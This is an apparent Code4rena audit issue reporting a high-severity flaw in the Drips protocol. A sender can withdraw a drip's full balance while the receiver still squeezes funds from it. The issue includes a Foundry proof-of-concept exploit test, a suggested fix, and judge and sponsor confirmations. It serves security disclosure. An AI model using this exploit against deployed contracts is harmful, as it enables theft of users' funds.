code-423n4 / 2023-01-drips-findings

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Drips that end after the current cycle but before its creation can allow users to profit from squeezing #315

Open code423n4 opened 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


By creating a drip that ends after the current cycle but before its creation time and immediately removing it, the sender doesn't have to put in any assets but the receiver can still squeeze this drip.

By setting a receiver that the sender controls, the sender can drain arbitrary asset from the contract.

Proof of Concept

Let the cycle length be 10 seconds. By i-th second I mean the i-th second of the cycle. At the 5th second, sender creates a drip that starts at 0th second and lasts for 2 seconds. At the 6th second, sender removes this drip. Since the drip ends before it was created, the dripped amount is 0, so the sender can retrieve their full balance. Now the receiver squeezes from this drip. SqueezeStartCap = _currCycleStart() = 0th second, squeezeEndCap = 6th second, so the receiver can still squeeze out the full amount even though the sender has withdrawn all of his balance.

Please add the following test to DripsHub.t.sol. It verifies that the sender has retrieved all of his assets but the receiver can still squeeze.

    function customSetDrips(
        uint256 forUser,
        uint128 balanceFrom,
        uint128 balanceTo,
        DripsReceiver[] memory newReceivers
    ) internal {
        int128 balanceDelta = int128(balanceTo) - int128(balanceFrom);
        DripsReceiver[] memory currReceivers = loadDrips(forUser);

        int128 realBalanceDelta =
            dripsHub.setDrips(forUser, erc20, currReceivers, balanceDelta, newReceivers, 0, 0);

        storeDrips(forUser, newReceivers);


    function testExploitSqueeze() public {
        // Start dripping
        DripsReceiver[] memory receivers = new DripsReceiver[](1);
        receivers[0] = DripsReceiver(
            DripsConfigImpl.create(0, uint160(1 * dripsHub.AMT_PER_SEC_MULTIPLIER()), uint32(block.timestamp), 2)

        DripsHistory[] memory history = new DripsHistory[](2);

        uint256 balanceBefore = balance();
        customSetDrips(user, 0, 2, receivers);
        (,, uint32 lastUpdate,, uint32 maxEnd) = dripsHub.dripsState(user, erc20);
        history[0] = DripsHistory(0, receivers, lastUpdate, maxEnd);

        receivers = dripsReceivers();
        customSetDrips(user, 2, 0, receivers);
        (,, lastUpdate,, maxEnd) = dripsHub.dripsState(user, erc20);
        history[1] = DripsHistory(0, receivers, lastUpdate, maxEnd);


        // Squeeze
        uint128 amt = dripsHub.squeezeDrips(receiver, erc20, user, 0, history);
        assertEq(amt, 2, "Invalid squeezed amt");

Tools Used

VSCode, Foundry

Recommended Mitigation Steps One potential solution is to add an additional check after this line. Something along the lines of: if (squeezeStartCap < drips.updateTime) squeezeStartCap = drips.updateTime;

c4-judge commented 1 year ago

GalloDaSballo marked the issue as primary issue

c4-sponsor commented 1 year ago

CodeSandwich marked the issue as sponsor confirmed

CodeSandwich commented 1 year ago

[confirm] Great job! This is a critical protocol breaker.

GalloDaSballo commented 1 year ago

The Warden has shown a way to trick the contract into disbursing out funds without the upfront payment.

Because this shows a way to steal the principal, I agree with High Severity

c4-judge commented 1 year ago

GalloDaSballo marked the issue as selected for report